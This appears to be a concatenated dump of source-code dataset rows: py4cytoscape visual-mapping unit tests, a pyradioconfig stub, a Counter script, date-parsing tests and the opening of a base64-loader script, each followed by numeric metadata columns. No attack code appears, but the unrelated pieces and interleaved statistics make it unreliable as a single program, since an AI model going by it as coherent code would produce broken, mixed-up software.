'cont_test_params': {'colors': ['#FBE723', '#440256']},
# 'cont_invalid_map_params': {'mapping_type': 'c'},
'cont_bad_map_params': {'colors': ['#FBE72', '#440256']},
'cont_short_map_params': {'colors': ['#440256']},
'disc_test_params': {'colors': ['#FFFF00', '#00FF00'], 'mapping_type': 'd'},
# 'disc_invalid_map_params': {'mapping_type': 'd'},
'pass_test_params': {'default_color': _NEW_DEFAULT, 'mapping_type': 'p'},
# 'pass_invalid_map_params': {'mapping_type': 'p'},
'invalid_map_params': {'mapping_type': 'X'},
'exception_check_params': {'mapping_type': 'p'},
})
@print_entry_exit
def test_set_edge_tooltip_mapping(self):
# _NEW_DEFAULT = 'Test'
_PASSTHRU_VAL = 'tooltip text'
# TODO: This fails because of a race condition when reading the tooltip immediately after setting it
self._check_set_edge_property({'prop_func': set_edge_tooltip_mapping,
'prop_name': 'EDGE_TOOLTIP',
# 'new_default': _NEW_DEFAULT,
# 'set_default' : 'p',
# 'compare_tolerance_percent': 0,
'passthru_val': _PASSTHRU_VAL,
# 'compare_tolerance_percent': 0,
# 'cont_test_params': {'heights': [120, 180]},
# 'cont_no_map_params': {'mapping_type': 'c'},
# 'cont_bad_map_params': {'heights': [120, 180]},
# 'cont_short_map_params': {'heights': [120]},
# 'disc_test_params': {'heights': [140, 190]},
# 'disc_no_map_params': {'mapping_type': 'd'},
'pass_test_params': {},
# 'pass_no_map_params': {'mapping_type': 'p'},
# 'invalid_map_params': {'mapping_type': 'X'},
'exception_check_params': {},
})
@print_entry_exit
def test_set_edge_target_arrow_shape_mapping(self):
_NEW_DEFAULT = 'CIRCLE'
# _PASSTHRU_VAL = 250
self._check_set_edge_property({'prop_func': set_edge_target_arrow_shape_mapping,
'prop_name': 'EDGE_TARGET_ARROW_SHAPE',
'new_default': _NEW_DEFAULT,
'set_default': 'd',
# 'passthru_val': _PASSTHRU_VAL,
# 'compare_tolerance_percent': 0,
# 'cont_test_params': {'opacities': [50, 100]},
# 'cont_no_map_params': {'mapping_type': 'c'},
# 'cont_bad_map_params': {'opacities': [550, 100]},
# 'cont_short_map_params': {'opacities': [50]},
'disc_test_params': {'shapes': ['DIAMOND', 'CIRCLE'],
'default_shape': _NEW_DEFAULT},
# 'disc_no_map_params': {'mapping_type': 'd'},
# 'pass_test_params': {'default_opacity': _NEW_DEFAULT, 'mapping_type': 'p'},
# 'pass_no_map_params': {'mapping_type': 'p'},
# 'invalid_map_params': {'mapping_type': 'X'},
'exception_check_params': {},
})
@print_entry_exit
def test_set_edge_source_arrow_shape_mapping(self):
_NEW_DEFAULT = 'CIRCLE'
# _PASSTHRU_VAL = 250
self._check_set_edge_property({'prop_func': set_edge_source_arrow_shape_mapping,
'prop_name': 'EDGE_SOURCE_ARROW_SHAPE',
'new_default': _NEW_DEFAULT,
'set_default': 'd',
# 'passthru_val': _PASSTHRU_VAL,
# 'compare_tolerance_percent': 0,
# 'cont_test_params': {'opacities': [50, 100]},
# 'cont_no_map_params': {'mapping_type': 'c'},
# 'cont_bad_map_params': {'opacities': [550, 100]},
# 'cont_short_map_params': {'opacities': [50]},
'disc_test_params': {'shapes': ['DIAMOND', 'CIRCLE'],
'default_shape': _NEW_DEFAULT},
# 'disc_no_map_params': {'mapping_type': 'd'},
# 'pass_test_params': {'default_opacity': _NEW_DEFAULT, 'mapping_type': 'p'},
# 'pass_no_map_params': {'mapping_type': 'p'},
# 'invalid_map_params': {'mapping_type': 'X'},
'exception_check_params': {},
})
# Verify that current and default versions of visual property for a node can be set, and that the expected
# errors are returned
#
# For explanation of 'profile' parameter, see _check_node_set_property()
#
def _check_set_edge_property(self, profile):
# Initialization
load_test_session()
_TEST_EDGE = 'YER110C (pp) YML007W'
_NOT_TEST_EDGE = 'YPR113W (pd) YMR043W'
_TEST_STYLE = 'galFiltered Style'
_CONT_COL = 'EdgeBetweenness' # Guaranteed to exist
_CONT_VAL_RANGE = [2.0, 20000.00]
_DESC_COL = 'interaction' # Guaranteed to exist
_DESC_VAL_RANGE = ['pp', 'px']
_PASS_COL = 'PassthruCol' # Created for passthru test
prop_func = profile['prop_func']
prop_name_list = profile['prop_name'] if isinstance(profile['prop_name'], list) else [profile['prop_name']]
orig_value_list = [get_edge_property(edge_names=[_TEST_EDGE], visual_property=prop_name)[_TEST_EDGE]
for prop_name in prop_name_list]
def check_default():
def_value_list = [get_edge_property(visual_property=prop_name)[_NOT_TEST_EDGE] for prop_name in
prop_name_list]
for def_value in def_value_list:
self._assert_equal(profile, def_value, profile['new_default'], msg='Check edge property equals default')
# Verify that applying a continuous mapping functions
if 'cont_test_params' in profile:
self.assertEqual(
prop_func(style_name=_TEST_STYLE, table_column=_CONT_COL, table_column_values=_CONT_VAL_RANGE,
**profile['cont_test_params']), '', msg='Check continuous mapping succeeded')
cont_value_list = [get_edge_property(visual_property=prop_name)[_TEST_EDGE] for prop_name in prop_name_list]
for cont_value, orig_value in zip(cont_value_list, orig_value_list):
self.assertNotEqual(cont_value, orig_value,
msg='Check continuous mapping not equal to original mapping')
if 'set_default' in profile and profile['set_default'] == 'c': check_default()
else:
cont_value_list = []
if 'cont_no_map_params' in profile:
self.assertRaises(CyError, prop_func, style_name=_TEST_STYLE, table_column=_CONT_COL,
**profile['cont_no_map_params'])
# Verify that applying a discrete mapping functions
if 'disc_test_params' in profile:
self.assertEqual(
prop_func(style_name=_TEST_STYLE, table_column=_DESC_COL, table_column_values=_DESC_VAL_RANGE,
**profile['disc_test_params']), '', msg='Check discrete mapping succeeded')
disc_value_list = [get_edge_property(visual_property=prop_name)[_TEST_EDGE] for prop_name in prop_name_list]
for disc_value, orig_value in zip(disc_value_list, orig_value_list):
self.assertNotEqual(disc_value, orig_value, msg='Check discrete mapping not equal to original mapping')
for disc_value, cont_value in zip(disc_value_list, cont_value_list):
self.assertNotEqual(disc_value, cont_value,
msg='Check discrete mapping not equal to continuous mapping')
if 'set_default' in profile and profile['set_default'] == 'd': check_default()
elif 'disc_no_map_params' in profile:
self.assertRaises(CyError, prop_func, style_name=_TEST_STYLE, table_column=_DESC_COL,
**profile['disc_no_map_params'])
# Create a column containing values, then verify that a passthru mapping causes a new value and new default value
if 'pass_test_params' in profile:
data = df.DataFrame(data={'id': [_TEST_EDGE], _PASS_COL: [profile['passthru_val']]})
load_table_data(data, data_key_column='id', table='edge', table_key_column='name')
self.assertEqual(prop_func(style_name=_TEST_STYLE, table_column=_PASS_COL, **profile['pass_test_params']),
'', msg='Check passthru mapping succeeded')
pass_value_list = [get_edge_property(visual_property=prop_name)[_TEST_EDGE] for prop_name in prop_name_list]
for pass_value in pass_value_list:
self.assertEqual(pass_value, profile['passthru_val'], msg='Check node property equals passthru mapping')
if 'set_default' in profile and profile['set_default'] == 'p': check_default()
elif 'pass_no_map_params' in profile:
self.assertRaises(CyError, prop_func, style_name=_TEST_STYLE, table_column=_CONT_COL,
**profile['pass_no_map_params'])
# Verify that a bad value is caught
if 'cont_bad_map_params' in profile:
self.assertRaises(CyError,
prop_func, style_name=_TEST_STYLE, table_column=_CONT_COL, table_column_values=_CONT_VAL_RANGE,
**profile['cont_bad_map_params'])
# Verify that a bad mapping type is caught
if 'invalid_map_params' in profile:
self.assertRaises(CyError,
prop_func, style_name=_TEST_STYLE, table_column=_PASS_COL, **profile['invalid_map_params'])
# Verify that a bad column name is caught
self.assertRaises(CyError, prop_func, style_name=_TEST_STYLE, table_column='Bogus Col',
**profile['exception_check_params'])
# Verify that a bad style name is caught
self.assertRaises(CyError, prop_func, style_name='Bogus Style', table_column=_PASS_COL,
**profile['exception_check_params'])
# Verify that that a short mapping is caught
if 'cont_short_map_params' in profile:
self.assertRaises(CyError, prop_func, style_name=_TEST_STYLE, table_column=_CONT_COL,
table_column_values=_CONT_VAL_RANGE, **profile['cont_short_map_params'])
# Verify that a bad network is caught
self.assertRaises(CyError, prop_func, style_name=_TEST_STYLE, table_column=_PASS_COL,
**profile['exception_check_params'], network='bogus network')
# Verify that current and default versions of visual property for a node can be set, and that the expected
# errors are returned
#
# profile is a dict that drives the test. Field values:
# {
# 'prop_func': name of function that sets node visual property
# 'prop_name': name of visual property to set
# 'new_default': value to set as new default ... type matches visual property
# 'set_default': type of mapping to use for testing that default is set properly (e.g., 'c', 'd', or 'p)
# 'passthru_val': for a passthru mapping, the value to put into the passthru column ... type matches property
# 'compare_tolerance_percent': for numeric properties that Cytoscape calculates,
# tolerance for Cytoscape's value matching expected 'new_default'
# 'cont_test_params': parameter to pass for a 'c' mapping when 'c' is available ... usually includes the range
# of mapped values. e.g., {'colors': ['#FBE723', '#440256']}
# 'cont_no_map_params': parameter to pass for verifying that 'c' is unavailable and trying to map 'c' should
# result in an error. e.g., {'mapping_type': 'c'}
# 'cont_bad_map_params': parameter to pass for verifying that parameter values are checked when 'c' is available.
# Should result in an error. e.g., {'colors': ['#FBE72', '#440256']},
# 'cont_short_map_params': parameter to pass for verifying that parameter values are checked when 'c' is available.
# Should result in an error. e.g., {'colors': ['#440256']} when two table_column_values are provided.
# 'disc_test_params': parameter to pass for a 'd' mapping when 'd' is available ... usually includes the list
# of mapped values. e.g., {'colors': ['#FFFF00', '#00FF00'], 'mapping_type': 'd'},
# 'disc_no_map_params': parameter to pass for verifying that 'd' is unavailable and trying to map 'd' should
# result in an error. e.g., {'mapping_type': 'd'},
# 'pass_test_params': parameter to pass for a 'p' mapping when 'p' is available ... usually includes the default
# value when the default can be set. e.g., {'default_color': _NEW_DEFAULT, 'mapping_type': 'p'},
# 'pass_no_map_params': parameter to pass for verifying that 'p' is unavailable and trying to map 'p' should
# result in an error. e.g., {'mapping_type': 'p'},
# 'invalid_map_params': parameter to pass to verify that an invalid mapping is caught. e.g., {'mapping_type': 'X'},
# 'exception_check_params': parameter to pass when checking for various kinds of exceptions. e.g., {'mapping_type': 'p'},
# }
def _check_set_node_property(self, profile):
# Initialization
load_test_session()
_TEST_NODE = 'YML007W'
_NOT_TEST_NODE = 'YGL035C'
_TEST_STYLE = 'galFiltered Style'
_CONT_COL = 'AverageShortestPathLength' # Guaranteed to exist
_CONT_VAL_RANGE = [1.0, 16.36]
_DESC_COL = 'Degree' # Guaranteed to exist
_DESC_VAL_RANGE = ['1', '2']
_PASS_COL = 'PassthruCol' # Created for passthru test
prop_func = profile['prop_func']
prop_name_list = profile['prop_name'] if isinstance(profile['prop_name'], list) else [profile['prop_name']]
orig_value_list = [get_node_property(node_names=[_TEST_NODE], visual_property=prop_name)[_TEST_NODE]
for prop_name in prop_name_list]
def check_default():
def_value_list = [get_node_property(visual_property=prop_name)[_NOT_TEST_NODE] for prop_name in
prop_name_list]
for def_value in def_value_list:
self._assert_equal(profile, def_value, profile['new_default'], msg='Check node property equals default')
# Verify that applying a continuous mapping functions
if 'cont_test_params' in profile:
self.assertEqual(
prop_func(style_name=_TEST_STYLE, table_column=_CONT_COL, table_column_values=_CONT_VAL_RANGE,
**profile['cont_test_params']), '',
msg='Check continuous mapping succeeded')
cont_value_list = [get_node_property(visual_property=prop_name)[_TEST_NODE] for prop_name in prop_name_list]
for cont_value, orig_value in zip(cont_value_list, orig_value_list):
self.assertNotEqual(cont_value, orig_value,
msg='Check continuous mapping not equal to original mapping')
if 'set_default' in profile and profile['set_default'] == 'c': check_default()
else:
cont_value_list = []
if 'cont_no_map_params' in profile:
self.assertRaises(CyError, prop_func, style_name=_TEST_STYLE, table_column=_CONT_COL,
**profile['cont_no_map_params'])
# Verify that applying a discrete mapping functions
if 'disc_test_params' in profile:
self.assertEqual(
prop_func(style_name=_TEST_STYLE, table_column=_DESC_COL, table_column_values=_DESC_VAL_RANGE,
**profile['disc_test_params']), '', msg='Check discrete mapping succeeded')
disc_value_list = [get_node_property(visual_property=prop_name)[_TEST_NODE] for prop_name in prop_name_list]
for disc_value, orig_value in zip(disc_value_list, orig_value_list):
self.assertNotEqual(disc_value, orig_value, msg='Check discrete mapping not equal to original mapping')
for disc_value, cont_value in zip(disc_value_list, cont_value_list):
self.assertNotEqual(disc_value, cont_value,
msg='Check discrete mapping not equal to continuous mapping')
if 'set_default' in profile and profile['set_default'] == 'd': check_default()
elif 'disc_no_map_params' in profile:
self.assertRaises(CyError, prop_func, style_name=_TEST_STYLE, table_column=_DESC_COL,
**profile['disc_no_map_params'])
# Create a column containing values, then verify that a passthru mapping causes a new value and new default value
if 'pass_test_params' in profile:
data = df.DataFrame(data={'id': [_TEST_NODE], _PASS_COL: [profile['passthru_val']]})
load_table_data(data, data_key_column='id', table='node', table_key_column='name')
self.assertEqual(prop_func(style_name=_TEST_STYLE, table_column=_PASS_COL, **profile['pass_test_params']),
'',
msg='Check passthru mapping succeeded')
pass_value_list = [get_node_property(visual_property=prop_name)[_TEST_NODE] for prop_name in prop_name_list]
for pass_value in pass_value_list:
self.assertEqual(pass_value, profile['passthru_val'], msg='Check node property equals passthru mapping')
if 'set_default' in profile and profile['set_default'] == 'p': check_default()
elif 'pass_no_map_params' in profile:
self.assertRaises(CyError, prop_func, style_name=_TEST_STYLE, table_column=_CONT_COL,
**profile['pass_no_map_params'])
# Verify that a bad value is caught
if 'cont_bad_map_params' in profile:
self.assertRaises(CyError,
prop_func, style_name=_TEST_STYLE, table_column=_CONT_COL, table_column_values=_CONT_VAL_RANGE,
**profile['cont_bad_map_params'])
# Verify that a bad mapping type is caught
if 'invalid_map_params' in profile:
self.assertRaises(CyError,
prop_func, style_name=_TEST_STYLE, table_column=_PASS_COL, **profile['invalid_map_params'])
# Verify that a bad column name is caught
self.assertRaises(CyError, prop_func, style_name=_TEST_STYLE, table_column='Bogus Col',
**profile['exception_check_params'])
# Verify that a bad style name is caught
self.assertRaises(CyError, prop_func, style_name='Bogus Style', table_column=_PASS_COL,
**profile['exception_check_params'])
# Verify that that a short mapping is caught
if 'cont_short_map_params' in profile:
self.assertRaises(CyError, prop_func, style_name=_TEST_STYLE, table_column=_CONT_COL,
table_column_values=_CONT_VAL_RANGE, **profile['cont_short_map_params'])
# Verify that a bad network is caught
self.assertRaises(CyError, prop_func, style_name=_TEST_STYLE, table_column=_PASS_COL,
**profile['exception_check_params'], network='bogus network')
def _assert_equal(self, profile, def_value, expected_value, msg):
if 'compare_tolerance_percent' in profile:
tolerance = float(profile['compare_tolerance_percent']) / 100
self.assertGreaterEqual(def_value, expected_value * (1 - tolerance), msg=msg)
self.assertLessEqual(def_value, expected_value * (1 + tolerance), msg=msg)
else:
self.assertEqual(def_value, expected_value, msg=msg)
# Verify that a visual property map is constructed as expected.
def _check_property(self, cy_property, expected_property, expected_column, expected_column_type, expected_type,
expected_cargo=None):
self.assertIsInstance(cy_property, dict)
self.assertEqual(cy_property['mappingType'], expected_type)
self.assertEqual(cy_property['mappingColumn'], expected_column)
self.assertEqual(cy_property['mappingColumnType'], expected_column_type)
self.assertEqual(cy_property['visualProperty'], expected_property)
if expected_type == 'discrete':
self.assertIsInstance(cy_property['map'], type(expected_cargo))
self.assertListEqual(cy_property['map'], expected_cargo)
elif expected_type == 'continuous':
self.assertIsInstance(cy_property['points'], type(expected_cargo))
self.assertListEqual(cy_property['points'], expected_cargo)
else:
self.assertEqual(len(cy_property), 4) # passthrough or unknown
if __name__ == '__main__':
unittest.main()
| 65.698664
| 127
| 0.492917
| 7,417
| 78,707
| 4.802076
| 0.061211
| 0.057613
| 0.073982
| 0.074122
| 0.845972
| 0.814779
| 0.788668
| 0.757588
| 0.745515
| 0.7269
| 0
| 0.024353
| 0.397423
| 78,707
| 1,197
| 128
| 65.753551
| 0.726633
| 0.189475
| 0
| 0.667097
| 0
| 0
| 0.203503
| 0.03104
| 0
| 0
| 0
| 0.000835
| 0.082581
| 1
| 0.059355
| false
| 0.147097
| 0.006452
| 0
| 0.068387
| 0.049032
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
9884d059c22b29622e6944ac95446d73c515923b
| 128
|
py
|
Python
|
platform/radio/efr32_multiphy_configurator/pyradioconfig/parts/viper/calculators/calc_misc.py
|
SiliconLabs/Gecko_SDK
|
991121c706578c9a2135b6f75cc88856e8c64bdc
|
[
"Zlib"
] | 82
|
2016-06-29T17:24:43.000Z
|
2021-04-16T06:49:17.000Z
|
platform/radio/efr32_multiphy_configurator/pyradioconfig/parts/viper/calculators/calc_misc.py
|
SiliconLabs/Gecko_SDK
|
991121c706578c9a2135b6f75cc88856e8c64bdc
|
[
"Zlib"
] | 2
|
2017-02-13T10:07:17.000Z
|
2017-03-22T21:28:26.000Z
|
platform/radio/efr32_multiphy_configurator/pyradioconfig/parts/viper/calculators/calc_misc.py
|
SiliconLabs/Gecko_SDK
|
991121c706578c9a2135b6f75cc88856e8c64bdc
|
[
"Zlib"
] | 56
|
2016-08-02T10:50:50.000Z
|
2021-07-19T08:57:34.000Z
|
from pyradioconfig.parts.bobcat.calculators.calc_misc import Calc_Misc_Bobcat
class calc_misc_viper(Calc_Misc_Bobcat):
pass
| 32
| 77
| 0.859375
| 19
| 128
| 5.421053
| 0.578947
| 0.31068
| 0.271845
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.085938
| 128
| 4
| 78
| 32
| 0.880342
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 8
|
120ba2e0d76a29112470270e5cfdffd44d462f67
| 2,006
|
py
|
Python
|
Boardgame_Heatmap/listsorter.py
|
Kieran-Everett/pythonCode
|
9dbac87ef9043fb6391391df636ea8098c2b3d58
|
[
"MIT"
] | null | null | null |
Boardgame_Heatmap/listsorter.py
|
Kieran-Everett/pythonCode
|
9dbac87ef9043fb6391391df636ea8098c2b3d58
|
[
"MIT"
] | null | null | null |
Boardgame_Heatmap/listsorter.py
|
Kieran-Everett/pythonCode
|
9dbac87ef9043fb6391391df636ea8098c2b3d58
|
[
"MIT"
] | null | null | null |
from collections import Counter
data = [2, 2, 2, 2, 2, 3, 3, 3, 3, 4, 4, 4, 4, 4, 4, 4, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 16, 16, 16, 16, 16, 16, 16, 16, 16, 16, 16, 16, 16, 16, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 18, 18, 18, 18, 18, 18, 18, 18, 18, 18, 18, 18, 18, 18, 18, 18, 19, 19, 19, 19, 19, 19, 19, 19, 19, 19, 19, 19, 19, 19, 19, 19, 19, 19, 20, 20, 20, 20, 20, 20, 20, 20, 20, 20, 20, 20, 20, 20, 20, 20, 20, 20, 20, 20, 20, 21, 21, 21, 21, 21, 21, 21, 21, 21, 21, 21, 21, 21, 22, 22, 22, 22, 22, 22, 22, 22, 22, 22, 22, 22, 23, 23, 23, 23, 23, 23, 23, 23, 23, 23, 23, 23, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 29, 30, 30, 30, 30, 30, 30, 30, 30, 30, 30, 30, 30, 31, 31, 31, 31, 31, 31, 31, 31, 31, 31, 31, 31, 31, 31, 31, 31, 31, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 33, 33, 33, 33, 33, 33, 33, 33, 33, 34, 34, 34, 34, 34, 34, 34, 35, 35, 35, 35, 35, 35, 35, 35, 35, 36, 36, 36, 36, 36, 36, 36, 36, 37, 37, 37, 37, 37, 37, 38, 38, 38, 38, 38, 38, 38, 38, 39, 39, 39, 39, 39, 39, 39, 39, 39, 39, 39, 39, 40, 40, 40, 40, 40, 40, 40, 41, 41, 41, 41, 41, 41, 41, 41]
c = Counter(data)
print(c.most_common(2000))
| 286.571429
| 1,926
| 0.485543
| 518
| 2,006
| 1.878378
| 0.096525
| 0.051387
| 0.073998
| 0.094553
| 0.924974
| 0.912641
| 0.87667
| 0.827338
| 0.790339
| 0.790339
| 0
| 0.613163
| 0.257727
| 2,006
| 6
| 1,927
| 334.333333
| 0.040296
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.25
| 0
| 0.25
| 0.25
| 0
| 0
| 1
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 12
|
123761bf53051d402d42bc59ef9b94e6f4f9567a
| 5,601
|
py
|
Python
|
hours/tests/test_parse_filter_date.py
|
SuviVappula/hauki
|
1af20d3a2e6fd7f7ca2834aaa52d3355aa658dfb
|
[
"MIT"
] | 3
|
2020-03-26T05:04:30.000Z
|
2022-03-22T15:57:18.000Z
|
hours/tests/test_parse_filter_date.py
|
SuviVappula/hauki
|
1af20d3a2e6fd7f7ca2834aaa52d3355aa658dfb
|
[
"MIT"
] | 81
|
2020-06-17T14:31:11.000Z
|
2022-02-20T19:01:54.000Z
|
hours/tests/test_parse_filter_date.py
|
SuviVappula/hauki
|
1af20d3a2e6fd7f7ca2834aaa52d3355aa658dfb
|
[
"MIT"
] | 9
|
2020-06-18T10:52:09.000Z
|
2022-02-11T13:05:59.000Z
|
import datetime
import pytest
from freezegun import freeze_time
from hours.filters import parse_maybe_relative_date_string
@pytest.mark.django_db
@pytest.mark.parametrize(
"input_string, end_date, frozen_date, expected_date",
(
# Special strings
("today", False, "2020-11-13", datetime.date(year=2020, month=11, day=13)),
# Dates
("1980-11-13", False, "2020-11-13", datetime.date(year=1980, month=11, day=13)),
("2020-11-13", False, "2020-11-13", datetime.date(year=2020, month=11, day=13)),
("2020-1-1", False, "2020-11-13", datetime.date(year=2020, month=1, day=1)),
("2020-12-31", False, "2020-11-13", datetime.date(year=2020, month=12, day=31)),
("2000-6-6", False, "2020-11-13", datetime.date(year=2000, month=6, day=6)),
("2050-6-6", False, "2020-11-13", datetime.date(year=2050, month=6, day=6)),
# Spaces
("- 0d", False, "2020-11-13", datetime.date(year=2020, month=11, day=13)),
("+ 0d", False, "2020-11-13", datetime.date(year=2020, month=11, day=13)),
("- 0d", False, "2020-11-13", datetime.date(year=2020, month=11, day=13)),
("+ 0d", False, "2020-11-13", datetime.date(year=2020, month=11, day=13)),
# Zero start
("-0d", False, "2020-11-13", datetime.date(year=2020, month=11, day=13)),
("+0d", False, "2020-11-13", datetime.date(year=2020, month=11, day=13)),
("-0w", False, "2020-11-13", datetime.date(year=2020, month=11, day=9)),
("+0w", False, "2020-11-13", datetime.date(year=2020, month=11, day=9)),
("-0m", False, "2020-11-13", datetime.date(year=2020, month=11, day=1)),
("+0m", False, "2020-11-13", datetime.date(year=2020, month=11, day=1)),
("-0y", False, "2020-11-13", datetime.date(year=2020, month=1, day=1)),
("+0y", False, "2020-11-13", datetime.date(year=2020, month=1, day=1)),
# Zero end
("-0d", True, "2020-11-13", datetime.date(year=2020, month=11, day=13)),
("+0d", True, "2020-11-13", datetime.date(year=2020, month=11, day=13)),
("-0w", True, "2020-11-13", datetime.date(year=2020, month=11, day=15)),
("+0w", True, "2020-11-13", datetime.date(year=2020, month=11, day=15)),
("-0m", True, "2020-11-13", datetime.date(year=2020, month=11, day=30)),
("+0m", True, "2020-11-13", datetime.date(year=2020, month=11, day=30)),
("-0y", True, "2020-11-13", datetime.date(year=2020, month=12, day=31)),
("+0y", True, "2020-11-13", datetime.date(year=2020, month=12, day=31)),
# One difference start
("+1d", False, "2020-11-13", datetime.date(year=2020, month=11, day=14)),
("-1d", False, "2020-11-13", datetime.date(year=2020, month=11, day=12)),
("+1w", False, "2020-11-13", datetime.date(year=2020, month=11, day=16)),
("-1w", False, "2020-11-13", datetime.date(year=2020, month=11, day=2)),
("+1m", False, "2020-11-13", datetime.date(year=2020, month=12, day=1)),
("-1m", False, "2020-11-13", datetime.date(year=2020, month=10, day=1)),
("+1y", False, "2020-11-13", datetime.date(year=2021, month=1, day=1)),
("-1y", False, "2020-11-13", datetime.date(year=2019, month=1, day=1)),
# One difference end
("+1d", True, "2020-11-13", datetime.date(year=2020, month=11, day=14)),
("-1d", True, "2020-11-13", datetime.date(year=2020, month=11, day=12)),
("+1w", True, "2020-11-13", datetime.date(year=2020, month=11, day=22)),
("-1w", True, "2020-11-13", datetime.date(year=2020, month=11, day=8)),
("+1m", True, "2020-11-13", datetime.date(year=2020, month=12, day=31)),
("-1m", True, "2020-11-13", datetime.date(year=2020, month=10, day=31)),
("+1y", True, "2020-11-13", datetime.date(year=2021, month=12, day=31)),
("-1y", True, "2020-11-13", datetime.date(year=2019, month=12, day=31)),
# One difference start, year boundary
("+1d", False, "2020-12-31", datetime.date(year=2021, month=1, day=1)),
("+1w", False, "2020-12-31", datetime.date(year=2021, month=1, day=4)),
("+1m", False, "2020-12-31", datetime.date(year=2021, month=1, day=1)),
("+1y", False, "2020-12-31", datetime.date(year=2021, month=1, day=1)),
# One difference end, year boundary
("+1d", True, "2020-12-31", datetime.date(year=2021, month=1, day=1)),
("+1w", True, "2020-12-31", datetime.date(year=2021, month=1, day=10)),
("+1m", True, "2020-12-31", datetime.date(year=2021, month=1, day=31)),
("+1y", True, "2020-12-31", datetime.date(year=2021, month=12, day=31)),
# One difference start, year boundary
("-1d", False, "2021-1-1", datetime.date(year=2020, month=12, day=31)),
("-1w", False, "2021-1-1", datetime.date(year=2020, month=12, day=21)),
# ("-1m", False, "2021-1-1", datetime.date(year=2020, month=12, day=1)),
("-1y", False, "2021-1-1", datetime.date(year=2020, month=1, day=1)),
# One difference end, year boundary
("-1d", True, "2021-1-1", datetime.date(year=2020, month=12, day=31)),
("-1w", True, "2021-1-1", datetime.date(year=2020, month=12, day=27)),
# ("-1m", True, "2021-1-1", datetime.date(year=2020, month=12, day=31)),
("-1y", True, "2021-1-1", datetime.date(year=2020, month=12, day=31)),
),
)
def test_parse_filter_date(input_string, end_date, frozen_date, expected_date):
with freeze_time(frozen_date):
assert parse_maybe_relative_date_string(input_string, end_date) == expected_date
| 63.647727
| 88
| 0.58561
| 876
| 5,601
| 3.714612
| 0.084475
| 0.217578
| 0.290104
| 0.270436
| 0.901352
| 0.876767
| 0.876152
| 0.864167
| 0.831592
| 0.781807
| 0
| 0.215395
| 0.183539
| 5,601
| 87
| 89
| 64.37931
| 0.496173
| 0.06606
| 0
| 0.085714
| 0
| 0
| 0.157754
| 0
| 0
| 0
| 0
| 0
| 0.014286
| 1
| 0.014286
| false
| 0
| 0.057143
| 0
| 0.071429
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
89f547810494fd4561502da827d9a921c5679f21
| 4,493
|
py
|
Python
|
bolt4ds/ds_template/build/script.py
|
leepand/bolt4ds
|
0b0e71deb8fc421d32e54d38a4c38a914e3aa732
|
[
"BSD-3-Clause"
] | null | null | null |
bolt4ds/ds_template/build/script.py
|
leepand/bolt4ds
|
0b0e71deb8fc421d32e54d38a4c38a914e3aa732
|
[
"BSD-3-Clause"
] | null | null | null |
bolt4ds/ds_template/build/script.py
|
leepand/bolt4ds
|
0b0e71deb8fc421d32e54d38a4c38a914e3aa732
|
[
"BSD-3-Clause"
] | null | null | null |
import gzip
import base64
import os
from pathlib import Path
from typing import Dict
# this is base64 encoded source code
